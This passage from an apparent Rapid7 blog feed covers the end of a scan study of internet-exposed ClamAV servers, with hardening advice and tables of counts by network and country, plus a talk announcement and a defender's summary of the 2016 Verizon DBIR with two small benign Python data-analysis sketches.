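If that one-packet exchange works from the internet, so will SCAN and SHUTDOWN; the fix is to bind clamd to localhost or a trusted interface (e.g., TCPAddr 127.0.0.1 in clamd.conf) and firewall the port.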
A Banner Haul

Now, not all VERSION queries respond with complete banner information, but over half did, and said response banner contains both the version string and the last time the scanner had a signature update. Despite the poor network configuration of the nodes, 2,930 (49.3%) of them were at least current with their signatures, but 346 of them weren't, with a handful being over a decade out of "compliance." We here at Rapid7 strive to stay within the rules, so we didn't poke any deeper to try to find out the signature (or further vulnerability) status of the other ClamAV nodes.

As we noted above, we performed post-scan DNS PTR queries and WHOIS queries for these nodes, but this exercise proved to be less than illuminating. These are nodes of all shapes and sizes sitting across many networks and hosting providers. There did seem to be a large commonality of these ClamAV systems running on hosts in "mom and pop" ISPs, and we did see a few at businesses and educational institutions, but overall these are fairly random and probably (in some cases) even accidental ClamAV deployments.

As a last exercise, we grouped the ClamAV nodes by autonomous system (AS) and tallied up the results. There was a bit of a signal here that you can clearly see in this list of the "top" 10 ASes:

AS | AS Name | Count | %
4766 | KIXS-AS-KR Korea Telecom, KR | 1,733 | 29.1%
16276 | OVH, FR | 513 | 8.6%
3786 | LGDACOM LG DACOM Corporation, KR | 316 | 5.3%
25394 | MK-NETZDIENSTE-AS, DE | 282 | 4.7%
35053 | PHADE-AS, DE | 263 | 4.4%
11994 | CZIO-ASN - Cruzio, US | 251 | 4.2%
41541 | SWEB-AS Serveisweb, ES | 175 | 2.9%
9318 | HANARO-AS Hanaro Telecom Inc., KR | 147 | 2.5%
23982 | SENDB-AS-KR Dongbu District Office of Education in Seoul, KR | 104 | 1.7%
24940 | HETZNER-AS, DE | 65 | 1.1%

Over 40% of these systems are on networks within the Republic of Korea. If we group those by country instead of AS, this "geographical" signal becomes a bit stronger:

Country | Count | %
Korea, Republic of | 2,463 | 41.4%
Germany | 830 | 14.0%
United States | 659 | 11.1%
France | 512 | 8.6%
Spain | 216 | 3.6%
Italy | 171 | 2.9%
United Kingdom | 99 | 1.7%
Russian Federation | 78 | 1.3%
Japan | 67 | 1.1%
Brazil | 62 | 1.0%

What are some takeaways from these findings?

Since there was a partial correlation between exposed ClamAV nodes and hosting at smaller ISPs, it might be handy if ISPs in general offered a free or very inexpensive "hygiene check" service which could provide critical information in understandable language for less tech-savvy server owners.

While this exposure is small, it does illustrate the need for implementing a robust configuration management strategy, especially for nodes that will be on the public internet. We have tools that can really help with this, but adopting solid DevOps principles with a security mindset is a free, proactive means of helping to ensure you aren't deploying toxic nodes on the internet.

Patching and upgrading go hand-in-hand with configuration management, and it's pretty clear almost 6,000 sites have not made this a priority. In their defense, many of these folks probably don't even know they are running ClamAV servers on the internet.

Don't forget your security technologies when dealing with configuration and patch management. We cyber practitioners spend a great deal of time pontificating about the need for these processes but oftentimes do not heed our own advice.

Turn stuff off. It's unlikely the handfuls of extremely old ClamAV nodes are serving any purpose, besides being easy marks for attackers.
They're consuming precious IPv4 space along with physical data center resources that they just don't need to be consuming.

Finally, don't assume that if your ClamAV (or any server software, really) is "just internal" that it's not susceptible to attack. Be wary of leaving egregiously open services like this available on any network node, internally or externally.

Fin

Many thanks to Jon Hart, Paul Deardorff & Derek Abdine for their engineering expertise on Project Sonar in support of this new study. We'll be keeping track of these ClamAV deployments and hopefully seeing far fewer of them as time goes on. Drop us a note at research@rapid7.com or post a comment here if you have any questions about this or future studies.

Rapid7's Data Science team, Live! from SOURCE Boston!


Suchin Gururangan and I (I'm pretty much there for looks, which is an indicator that Jen Ellis might need prescription lenses) will be speaking at SOURCE Boston this week about "doing data science" at "internet scale" and about how you can get started doing security data science at home or in your organization. So, come on over to learn more about the unique challenges associated with analyzing "security data", the evolution of IPv4 autonomous systems, and where your adversaries may be squirreled away, and to find out what information lies hidden in this seemingly innocuous square:

The 2016 Verizon Data Breach Investigations Report (DBIR) Summary - The Defender's Perspective


Verizon has released the 2016 edition of their annual Data Breach Investigations Report (DBIR). Their crack team of researchers has, once again, produced one of the most respected, data-driven reports in cyber security, sifting through submissions from 67 contributors and taking a deep dive into 64,000 incidents—and nearly 2,300 breaches—to help provide insight on what our adversaries are up to and how successful they've been.

The DBIR is a highly anticipated research project and has valuable information for many groups. Policy makers use it to defend legislation; pundits and media use it to crank out scary articles; other researchers and academics take the insights in the report and identify new avenues to explore; and vendors quickly identify product and services areas that are aligned with the major findings. Yet the data in the report is of paramount import to defenders. With over 80 pages to wade through, we thought it might be helpful to provide some waypoints that you can use to navigate through this year's breach and incident map.

Bigger is…Better?

There are a couple of "gotchas" with data submitted to the DBIR team. The first is that a big chunk of data comes from the U.S. public sector, where there are mandatory reporting laws, regulations, and requirements. The second is the YUGE number of Unknowns. The DBIR acknowledges this, and it's still valuable to look at the data where there are "knowns", even with this grey (okay, ours is green below) blob of uncertainty in the mix. You can easily find your industry in DBIR Tables 1 & 2 (pages 3 & 4), and if we pivot on that data we can see the distribution of the percentage of incidents that are breaches. We've removed the "Public (92)" industry from this set to get a better sense of what's happening across general industries. For the DBIR, there were more submissions of incidents with confirmed data disclosure for smaller organizations than large (i.e. be careful out there, SMBs), but there's also a big pile of Unknowns. We can also take another, discrete view of this by industry.

As defenders, you should be reading the report with an eye for your industry, size, and other characteristics to help build up your threat profiles and help benchmark your security program. Take your incident-to-breach ratio (you are using VERIS to record and track everything from anti-virus hits to full-on breaches, right?) and compare it to the corresponding industry/size.

The Single Most Popular Valuable Chart In The World! (for defenders)

When it comes right down to it, you're usually fighting an economic battle with your adversaries. This year's report, Figure 3 (page 7), shows that the motivations are still primarily financial and that Hacking, Malware and Social are the weapons of choice for attackers. We'll dive into that in a bit, but we need to introduce our take on DBIR Figure 8 (page 10) before continuing. We smoothed out the rough edges from the 2016 Verizon Data Breach Report figure to paint a somewhat clearer picture of the overall trends, and used a complex statistical transformation (i.e. subtraction) to focus on the smoothed gap.

Remember, the DBIR data is a biased sample from the overall population of cyber security incidents and breaches that occur, and every statistical transformation introduces more uncertainty along the way. That means your takeaway from "Part Deux" should be "we're not getting any better" vs "THE DETECTION DEFICIT TOPPED 75% FOR THE FIRST TIME IN HISTORY!"
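To make that "complex statistical transformation" concrete, here's a minimal sketch of the detection-deficit arithmetic using made-up numbers (illustrative only, not DBIR data): smooth the two yearly "days or less" percentage series, then subtract.

# Detection deficit sketch: percentage of breaches compromised within days
# vs. percentage discovered within days, one value per year. Numbers are
# illustrative only, NOT taken from the DBIR.
compromise_pct = [61, 67, 62, 67, 89, 62, 77, 68, 60, 81, 84]
discovery_pct  = [30, 26, 40, 43, 32, 18, 26, 21, 22, 32, 25]

def smooth(xs, w=3):
    """Centered moving average; windows shrink at the edges."""
    half = w // 2
    return [sum(xs[max(0, i - half):i + half + 1]) /
            len(xs[max(0, i - half):i + half + 1]) for i in range(len(xs))]

deficit = [c - d for c, d in zip(smooth(compromise_pct), smooth(discovery_pct))]
print([round(x, 1) for x in deficit])   # the smoothed gap, one value per year

The point of the smoothing is to read the trend rather than any single year's wiggle, which is exactly why the takeaway is "the gap isn't closing" instead of a headline about any one data point.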
So, our adversaries are accomplishing their goals in days or less at an ever-quickening success rate while defenders are just not keeping up at all. Before we can understand what we need to do to reverse these trends, we need to see what the attackers are doing. We took the data from DBIR Figure 6 (page 9), pulled out the top threat actions for each year, then filtered the result to the areas that match both the major threat action categories and the areas of concern on which Rapid7 customers have a keen focus. Some key takeaways:

Malware and hacking events dropping C2s are up
Key loggers are making a comeback (this may be an artifact of the heavy influence of Dridex in the DBIR data set this year)
Malware-based exfiltration is back to previously seen levels
Phishing is pretty much holding steady, which most likely supports the use of compromised credentials (which is trending up)

Endpoint monitoring, kicking up your awareness programs, and watching out for wonky user account behavior would be wise things to prioritize based on this data.

Not all Cut-and-Dridex

The Verizon Data Breach Report mentions Dridex 13 times and was very up front about the bias it introduced in the report. So, how can you interpret the data with "DrideRx" prescription lenses? Rapid7's Analytic Response Team notes that Dridex campaigns involve:

Phishing
Endpoint malware drops
Establishment of command and control (C2) on the endpoint
Harvesting credentials and shipping them back to the C2 servers

This means that—at a minimum—the data behind the Data Breach Investigations Report, Figures 6-8 & 15-22, impacted the overall findings, and Verizon itself warns about broad interpretations of the Web App Attacks category: "Hundreds of breaches involving social attacks on customers, followed by the Dridex malware and subsequent use of credentials captured by keyloggers, dominate the actions." So, when interpreting the results, keep an eye out for the above components and factor in the Dridex component before tweaking your security program too much in one direction or another.

Who has your back?

When reading any report, one should always check to make sure the data presented doesn't conflict with itself. One way to validate the detection deficit above is to look at DBIR Figure 9 (page 11), which shows (when known) how breaches were discovered over time. We can simplify this view as well: in the significant majority of cases, defenders have law enforcement agencies (like the FBI in the United States) and other external parties to "thank" for letting them know they've been pwnd. As our figure shows, we stopped being able to watch our own backs half a decade ago and have yet to recover.

This should be a wake-up call to defenders to focus on identifying how attackers are getting into their organizations and instrumenting better ways to detect their actions. Are you:

Identifying critical assets and access points?
Monitoring the right things (or anything) on your endpoints?
Getting the right logs into the right places for analysis and action?
Deploying honeypots to catch activity that should not be happening?

If not, these may be things you need to re-prioritize in order to force the attackers to invest more time and resources to accomplish their goals (remember, this is a battle of economics).

Are You Feeling Vulnerable?

Attackers are continuing to use stolen credentials at an alarming rate, and they obtain these credentials through both social engineering and the exploitation of vulnerabilities.
Similarly, lateral movement within an organization also relies—in part—on exploiting vulnerabilities. DBIR Figure 13 (page 16) shows that, as a group, defenders are staying on top of current and year-minus-one vulnerabilities fairly well. We're still having issues patching or mitigating older vulnerabilities, though, many of which have tried-and-true exploits that will work juuuust fine. Leaving these attack points exposed is not helping your economic battle with your adversaries, as letting them rely on past R&D means they have more time and opportunity. How can you get the upper hand?

Maintain situational awareness when it comes to vulnerabilities (i.e. scan with a plan)
Develop a patching strategy with a holistic focus; don't just react to "Patch Tuesday"
Don't dismiss mitigation. There are legitimate technical and logistic reasons that can make patching difficult. Work on developing a playbook of mitigation strategies you can rely on when these types of vulnerabilities arise.

"Threat intelligence" was a noticeably absent topic in the 2016 DBIR, but we feel it can play a key role when it comes to defending your organization while vulnerabilities are present. Your vuln management, server/app management, and security operations teams should be working in tandem to know where vulnerabilities still exist and to monitor and block malicious activity that is associated with targets that are still vulnerable. This is one of the best ways to utilize all those threat intel feeds you have gathering dust in your SIEM; a small sketch of this kind of join appears at the end of this post.

There and Back Again

This post outlined just a few of the interesting markers on your path through the Verizon Data Breach Report. Keep a watchful eye on the Rapid7 Community for more insight into other critical areas of the report and where we can help you address the key issues facing your organization. (Many thanks to Rapid7's Roy Hodgman and Rebekah Brown for their contributions to this post.)

Related Resources:

Watch my short take on this year's Verizon Data Breach Investigations Report.
Join us for a live webcast as we dig deeper into the 2016 Verizon Data Breach Investigations Report findings. Tuesday, May 10 at 2PM ET/11AM PT. Register now!
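As promised, here's a minimal sketch of that vuln-plus-intel join (the file names and column names are hypothetical; substitute exports from your own scanner and SIEM):

import csv

def load_column(path, column):
    """Collect one column of a CSV export into a set."""
    with open(path, newline="") as f:
        return {row[column] for row in csv.DictReader(f)}

vulnerable_hosts = load_column("open_vulns.csv", "ip")        # vuln scanner export
intel_hits       = load_column("intel_alerts.csv", "dst_ip")  # SIEM / intel feed export

# Alerts that touch still-vulnerable hosts go to the top of the queue
for ip in sorted(vulnerable_hosts & intel_hits):
    print(f"prioritize: {ip} is vulnerable AND receiving intel-flagged traffic")

It's deliberately simple: the value isn't in the code, it's in routinely intersecting two data sets that usually live in different teams' consoles.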
